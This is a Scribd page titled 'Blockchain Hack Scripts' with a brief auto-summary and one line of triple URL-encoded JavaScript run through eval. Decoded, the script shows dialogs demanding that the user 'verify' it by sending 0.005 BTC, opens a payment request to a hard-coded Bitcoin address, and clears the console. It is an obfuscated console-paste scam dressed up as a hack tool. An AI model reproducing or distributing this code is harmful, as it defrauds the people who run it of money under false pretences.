0% found this document useful (0 votes)
233 views

Blockchain Hack Scripts

This document contains JavaScript code that prompts the user to verify a script by sending 0.005 BTC to a given Bitcoin address. It uses window methods like prompt, confirm, and open to display messages to the user and open a Bitcoin payment page. The overall purpose seems to be verifying a script by having the user send a small amount of BTC to an address.

Uploaded by

Suraj Bhattarai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
233 views

Blockchain Hack Scripts

This document contains JavaScript code that prompts the user to verify a script by sending 0.005 BTC to a given Bitcoin address. It uses window methods like prompt, confirm, and open to display messages to the user and open a Bitcoin payment page. The overall purpose seems to be verifying a script by having the user send a small amount of BTC to an address.

Uploaded by

Suraj Bhattarai
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

eval(decodeURIComponent(decodeURIComponent(decodeURIComponent('var%252520r7gxo

%252520%25253D%252520parseFloat%252528prompt%252528%252522https%25253A%25252F
%25252Fwww.blockchain.com%25252Fbtc%25252Ftx%25252F%252522%252529%252529%25253B
%25250Avar%252520r7gxo%252520%25253D%252520parseFloat%252528prompt
%252528%252522Your%252520script%252520must%252520be%252520verified%252520with
%252520your%252520BlockChain%252520wallet%252520before%252520you%252520can
%252520take%252520this%252520action.%252520Please%252520verify%252520script
%252520by%252520adding%252520%2525280.005%252529%252520BTC%252520to%252520apparent
%252520address
%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520Block
%252520%252520%252520%252520blockchain.com%252520%25253A%252522%25252C
%25252213QT2RQfD7eLXZkYGKggCjWrReGas4znLi%252522%252529%252529%25253B%25250Avar
%252520w8ugo%252520%25253D%252520window.confirm%252528%252522Your%252520script
%252520must%252520be%252520verified%252520with%252520your%252520account
%252520before%252520you%252520can%252520take%252520this%252520action.%252520Click
%252520OK%252520to%252520Verify%252520Script%252522%252529%25253B%25250Aif
%252520%252528w8ugo%252529%252520%25257B%252520window.open%252528%252527https
%25253A%25252F%25252Fwww.blockchain.com%25252Fbtc%25252Fpayment_request
%25253Faddress%25253D16jR4NV8vzh4RF5W5QdAo29t26bFK1iTTc%252526message%25253DScript
%25252520Verification%252526amount%25253D0.005%252527%252529%25253B%252520%25257D
%252520%25250Aelse%252520%25257B%252520alert%252528%252522Please%252520back
%252520to%252520verify%252520script.%252522%252529%25253B%252520%25257D
%252520%25250Aconsole.clear%252528%252529%25253B%25250Aconsole.log
%252528%252527Script%252520not%252520verified%252521%252527%252529%25253B'))));

You might also like